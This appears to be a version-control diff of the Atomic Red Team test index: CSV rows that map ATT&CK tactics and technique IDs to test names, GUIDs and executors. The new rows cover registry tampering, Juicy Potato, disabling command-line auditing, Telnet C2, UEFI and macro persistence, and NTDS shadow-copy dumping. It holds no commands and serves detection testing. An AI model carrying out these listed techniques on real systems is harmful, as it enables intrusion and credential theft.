-defense-evasion,T1112,Modify Registry,62,Scarab Ransomware Defense Evasion Activities,ca8ba39c-3c5a-459f-8e15-280aec65a910,command_prompt
-defense-evasion,T1112,Modify Registry,63,Disable Remote Desktop Anti-Alias Setting Through Registry,61d35188-f113-4334-8245-8c6556d43909,command_prompt
-defense-evasion,T1112,Modify Registry,64,Disable Remote Desktop Security Settings Through Registry,4b81bcfa-fb0a-45e9-90c2-e3efe5160140,command_prompt
-defense-evasion,T1112,Modify Registry,65,Disabling ShowUI Settings of Windows Error Reporting (WER),09147b61-40f6-4b2a-b6fb-9e73a3437c96,command_prompt
-defense-evasion,T1112,Modify Registry,66,Enable Proxy Settings,eb0ba433-63e5-4a8c-a9f0-27c4192e1336,command_prompt
-defense-evasion,T1112,Modify Registry,67,Set-Up Proxy Server,d88a3d3b-d016-4939-a745-03638aafd21b,command_prompt
-defense-evasion,T1112,Modify Registry,68,RDP Authentication Level Override,7e7b62e9-5f83-477d-8935-48600f38a3c6,command_prompt
+defense-evasion,T1112,Modify Registry,4,Use Powershell to Modify registry to store logon credentials,68254a85-aa42-4312-a695-38b7276307f8,powershell
+defense-evasion,T1112,Modify Registry,5,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
+defense-evasion,T1112,Modify Registry,6,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
+defense-evasion,T1112,Modify Registry,7,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
+defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
+defense-evasion,T1112,Modify Registry,9,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
+defense-evasion,T1112,Modify Registry,10,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
+defense-evasion,T1112,Modify Registry,11,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
+defense-evasion,T1112,Modify Registry,12,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
+defense-evasion,T1112,Modify Registry,13,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
+defense-evasion,T1112,Modify Registry,14,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
+defense-evasion,T1112,Modify Registry,15,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
+defense-evasion,T1112,Modify Registry,16,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
+defense-evasion,T1112,Modify Registry,17,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
+defense-evasion,T1112,Modify Registry,18,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
+defense-evasion,T1112,Modify Registry,19,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
+defense-evasion,T1112,Modify Registry,20,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
+defense-evasion,T1112,Modify Registry,21,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
+defense-evasion,T1112,Modify Registry,22,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
+defense-evasion,T1112,Modify Registry,23,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
+defense-evasion,T1112,Modify Registry,24,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
+defense-evasion,T1112,Modify Registry,25,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
+defense-evasion,T1112,Modify Registry,26,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
+defense-evasion,T1112,Modify Registry,27,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
+defense-evasion,T1112,Modify Registry,28,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
+defense-evasion,T1112,Modify Registry,29,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
+defense-evasion,T1112,Modify Registry,30,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
+defense-evasion,T1112,Modify Registry,31,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
+defense-evasion,T1112,Modify Registry,32,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
+defense-evasion,T1112,Modify Registry,33,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
+defense-evasion,T1112,Modify Registry,34,Windows Add Registry Value to Load Service in Safe Mode without Network,1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5,command_prompt
+defense-evasion,T1112,Modify Registry,35,Windows Add Registry Value to Load Service in Safe Mode with Network,c173c948-65e5-499c-afbe-433722ed5bd4,command_prompt
+defense-evasion,T1112,Modify Registry,36,Disable Windows Toast Notifications,003f466a-6010-4b15-803a-cbb478a314d7,command_prompt
+defense-evasion,T1112,Modify Registry,37,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
+defense-evasion,T1112,Modify Registry,38,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
+defense-evasion,T1112,Modify Registry,39,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
+defense-evasion,T1112,Modify Registry,40,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
+defense-evasion,T1112,Modify Registry,41,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
+defense-evasion,T1112,Modify Registry,42,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
+defense-evasion,T1112,Modify Registry,43,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
+defense-evasion,T1112,Modify Registry,44,DisallowRun Execution Of Certain Applications,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
+defense-evasion,T1112,Modify Registry,45,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
+defense-evasion,T1112,Modify Registry,46,Mimic Ransomware - Enable Multiple User Sessions,39f1f378-ba8a-42b3-96dc-2a6540cfc1e3,command_prompt
+defense-evasion,T1112,Modify Registry,47,Mimic Ransomware - Allow Multiple RDP Sessions per User,35727d9e-7a7f-4d0c-a259-dc3906d6e8b9,command_prompt
+defense-evasion,T1112,Modify Registry,48,Event Viewer Registry Modification - Redirection URL,6174be7f-5153-4afd-92c5-e0c3b7cdb5ae,command_prompt
+defense-evasion,T1112,Modify Registry,49,Event Viewer Registry Modification - Redirection Program,81483501-b8a5-4225-8b32-52128e2f69db,command_prompt
+defense-evasion,T1112,Modify Registry,50,Enabling Remote Desktop Protocol via Remote Registry,e3ad8e83-3089-49ff-817f-e52f8c948090,command_prompt
+defense-evasion,T1112,Modify Registry,51,Disable Win Defender Notification,12e03af7-79f9-4f95-af48-d3f12f28a260,command_prompt
+defense-evasion,T1112,Modify Registry,52,Disable Windows OS Auto Update,01b20ca8-c7a3-4d86-af59-059f15ed5474,command_prompt
+defense-evasion,T1112,Modify Registry,53,Disable Windows Auto Reboot for current logon user,396f997b-c5f8-4a96-bb2c-3c8795cf459d,command_prompt
+defense-evasion,T1112,Modify Registry,54,Windows Auto Update Option to Notify before download,335a6b15-b8d2-4a3f-a973-ad69aa2620d7,command_prompt
+defense-evasion,T1112,Modify Registry,55,Do Not Connect To Win Update,d1de3767-99c2-4c6c-8c5a-4ba4586474c8,command_prompt
+defense-evasion,T1112,Modify Registry,56,Tamper Win Defender Protection,3b625eaa-c10d-4635-af96-3eae7d2a2f3c,command_prompt
+defense-evasion,T1112,Modify Registry,57,Snake Malware Registry Blob,8318ad20-0488-4a64-98f4-72525a012f6b,powershell
+defense-evasion,T1112,Modify Registry,58,Allow Simultaneous Download Registry,37950714-e923-4f92-8c7c-51e4b6fffbf6,command_prompt
+defense-evasion,T1112,Modify Registry,59,Modify Internet Zone Protocol Defaults in Current User Registry - cmd,c88ef166-50fa-40d5-a80c-e2b87d4180f7,command_prompt
+defense-evasion,T1112,Modify Registry,60,Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell,b1a4d687-ba52-4057-81ab-757c3dc0d3b5,powershell
+defense-evasion,T1112,Modify Registry,61,Activities To Disable Secondary Authentication Detected By Modified Registry Value.,c26fb85a-fa50-4fab-a64a-c51f5dc538d5,command_prompt
+defense-evasion,T1112,Modify Registry,62,Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.,ffeddced-bb9f-49c6-97f0-3d07a509bf94,command_prompt
+defense-evasion,T1112,Modify Registry,63,Scarab Ransomware Defense Evasion Activities,ca8ba39c-3c5a-459f-8e15-280aec65a910,command_prompt
+defense-evasion,T1112,Modify Registry,64,Disable Remote Desktop Anti-Alias Setting Through Registry,61d35188-f113-4334-8245-8c6556d43909,command_prompt
+defense-evasion,T1112,Modify Registry,65,Disable Remote Desktop Security Settings Through Registry,4b81bcfa-fb0a-45e9-90c2-e3efe5160140,command_prompt
+defense-evasion,T1112,Modify Registry,66,Disabling ShowUI Settings of Windows Error Reporting (WER),09147b61-40f6-4b2a-b6fb-9e73a3437c96,command_prompt
+defense-evasion,T1112,Modify Registry,67,Enable Proxy Settings,eb0ba433-63e5-4a8c-a9f0-27c4192e1336,command_prompt
+defense-evasion,T1112,Modify Registry,68,Set-Up Proxy Server,d88a3d3b-d016-4939-a745-03638aafd21b,command_prompt
+defense-evasion,T1112,Modify Registry,69,RDP Authentication Level Override,7e7b62e9-5f83-477d-8935-48600f38a3c6,command_prompt
 defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
 defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
@@ -380,19 +384,22 @@ defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1
 defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
 defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
 defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
+defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,5,Juicy Potato,f095e373-b936-4eb4-8d22-f47ccbfbe64a,powershell
 defense-evasion,T1564.002,Hide Artifacts: Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
 defense-evasion,T1564.002,Hide Artifacts: Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
 defense-evasion,T1564.002,Hide Artifacts: Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTSIZE environment variable,386d3850-2ce7-4508-b56b-c0558922c814,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,8,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,9,Setting the HISTFILE environment variable (freebsd),f7308845-6da8-468e-99f2-4271f2f5bb67,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,10,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,4,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,5,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,6,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,7,Setting the HISTSIZE environment variable,386d3850-2ce7-4508-b56b-c0558922c814,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,8,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,9,Setting the HISTFILE environment variable (freebsd),f7308845-6da8-468e-99f2-4271f2f5bb67,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,10,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,11,Disable Windows Command Line Auditing using reg.exe,1329d5ab-e10e-4e5e-93d1-4d907eb656e5,command_prompt
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,12,Disable Windows Command Line Auditing using Powershell Cmdlet,95f5c72f-6dfe-45f3-a8c1-d8faa07176fa,powershell
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
@@ -740,6 +747,7 @@ privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Th
 privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
 privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
 privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
+privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,5,Juicy Potato,f095e373-b936-4eb4-8d22-f47ccbfbe64a,powershell
 privilege-escalation,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
 privilege-escalation,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
 privilege-escalation,T1098.001,Account Manipulation: Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
@@ -909,6 +917,7 @@ execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using
 execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
 execution,T1106,Native API,5,Run Shellcode via Syscall in Go,ae56083f-28d0-417d-84da-df4242da1f7c,powershell
 execution,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
+execution,T1059,Command and Scripting Interpreter,1,AutoIt Script Execution,a9b93f17-31cb-435d-a462-5e838a2a6026,powershell
 execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
 execution,T1609,Kubernetes Exec Into Container,2,Docker Exec Into Container,900e2c49-221b-42ec-ae3c-4717e41e6219,bash
 execution,T1569.001,System Services: Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash
@@ -996,6 +1005,7 @@ persistence,T1546.013,Event Triggered Execution: PowerShell Profile,1,Append mal
 persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
+persistence,T1542.001,Pre-OS Boot: System Firmware,1,UEFI Persistence via Wpbbin.exe File Creation,b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1,powershell
 persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
@@ -1082,6 +1092,7 @@ persistence,T1136.002,Create Account: Domain Account,2,Create a new account simi
 persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
 persistence,T1136.002,Create Account: Domain Account,4,Active Directory Create Admin Account,562aa072-524e-459a-ba2b-91f1afccf5ab,sh
 persistence,T1136.002,Create Account: Domain Account,5,Active Directory Create User Account (Non-elevated),8c992cb3-a46e-4fd5-b005-b1bab185af31,sh
+persistence,T1137.001,Office Application Startup: Office Template Macros.,1,Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell,940db09e-80b6-4dd0-8d4d-7764f89b47a8,powershell
 persistence,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
 persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
 persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
@@ -1209,6 +1220,7 @@ command-and-control,T1071.004,Application Layer Protocol: DNS,1,DNS Large Query
 command-and-control,T1071.004,Application Layer Protocol: DNS,2,DNS Regular Beaconing,3efc144e-1af8-46bb-8ca2-1376bb6db8b6,powershell
 command-and-control,T1071.004,Application Layer Protocol: DNS,3,DNS Long Domain Query,fef31710-223a-40ee-8462-a396d6b66978,powershell
 command-and-control,T1071.004,Application Layer Protocol: DNS,4,DNS C2,e7bf9802-2e78-4db9-93b5-181b7bcd37d7,powershell
+command-and-control,T1071,Application Layer Protocol,1,Telnet C2,3b0df731-030c-4768-b492-2a3216d90e53,powershell
 command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
 command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
 command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
@@ -1220,6 +1232,7 @@ command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ec
 command-and-control,T1219,Remote Access Software,9,UltraViewer - RAT Execution,19acf63b-55c4-4b6a-8552-00a8865105c8,powershell
 command-and-control,T1219,Remote Access Software,10,UltraVNC Execution,42e51815-a6cc-4c75-b970-3f0ff54b610e,powershell
 command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b8128b-c5d4-4de9-bf70-e60419274562,powershell
+command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test on Windows,f1641ba9-919a-4323-b74f-33372333bf0e,powershell
 command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
 command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
 command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
@@ -1266,6 +1279,8 @@ command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript
 command-and-control,T1105,Ingress Tool Transfer,27,Linux Download File and Run,bdc373c5-e9cf-4563-8a7b-a9ba720a90f3,sh
 command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b1729c57-9384-4d1c-9b99-9b220afb384e,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request download,c01cad7f-7a4c-49df-985e-b190dcf6a279,command_prompt
+command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
+command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
 command-and-control,T1090.001,Proxy: Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Proxy: Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1090.001,Proxy: Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
@@ -1278,6 +1293,7 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compress
 collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
 collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
 collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash
+collection,T1560.001,Archive Collected Data: Archive via Utility,10,ESXi - Remove Syslog remote IP,36c62584-d360-41d6-886f-d194654be7c2,powershell
 collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
 collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
 collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
@@ -1373,6 +1389,7 @@ credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User
 credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
 credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
 credential-access,T1110.001,Brute Force: Password Guessing,7,SUDO Brute Force - FreeBSD,abcde488-e083-4ee7-bc85-a5684edd7541,bash
+credential-access,T1110.001,Brute Force: Password Guessing,8,ESXi - Brute Force Until Account Lockout,ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5,powershell
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
 credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
@@ -1533,6 +1550,7 @@ credential-access,T1003.003,OS Credential Dumping: NTDS,5,Create Volume Shadow C
 credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
 credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
 credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
+credential-access,T1003.003,OS Credential Dumping: NTDS,9,Create Volume Shadow Copy with diskshadow,b385996c-0e7d-4e27-95a4-aca046b119a7,command_prompt
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
@@ -1644,6 +1662,7 @@ discovery,T1135,Network Share Discovery,9,WinPwn - shareenumeration,987901d1-5b8
 discovery,T1135,Network Share Discovery,10,Network Share Discovery via dir command,13daa2cf-195a-43df-a8bd-7dd5ffb607b5,command_prompt
 discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
 discovery,T1120,Peripheral Device Discovery,2,WinPwn - printercheck,cb6e76ca-861e-4a7f-be08-564caa3e6f75,powershell
+discovery,T1120,Peripheral Device Discovery,3,Peripheral Device Discovery via fsutil,424e18fd-48b8-4201-8d3a-bf591523a686,command_prompt
 discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
 discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
 discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
@@ -1718,6 +1737,7 @@ discovery,T1049,System Network Connections Discovery,3,"System Network Connectio
 discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
 discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
 discovery,T1654,Log Enumeration,1,Get-EventLog To Enumerate Windows Security Log,a9030b20-dd4b-4405-875e-3462c6078fdc,powershell
+discovery,T1654,Log Enumeration,2,Enumerate Windows Security Log via WevtUtil,fef0ace1-3550-4bf1-a075-9fea55a778dd,command_prompt
 discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
 discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
 discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
@@ -1893,6 +1913,7 @@ exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh
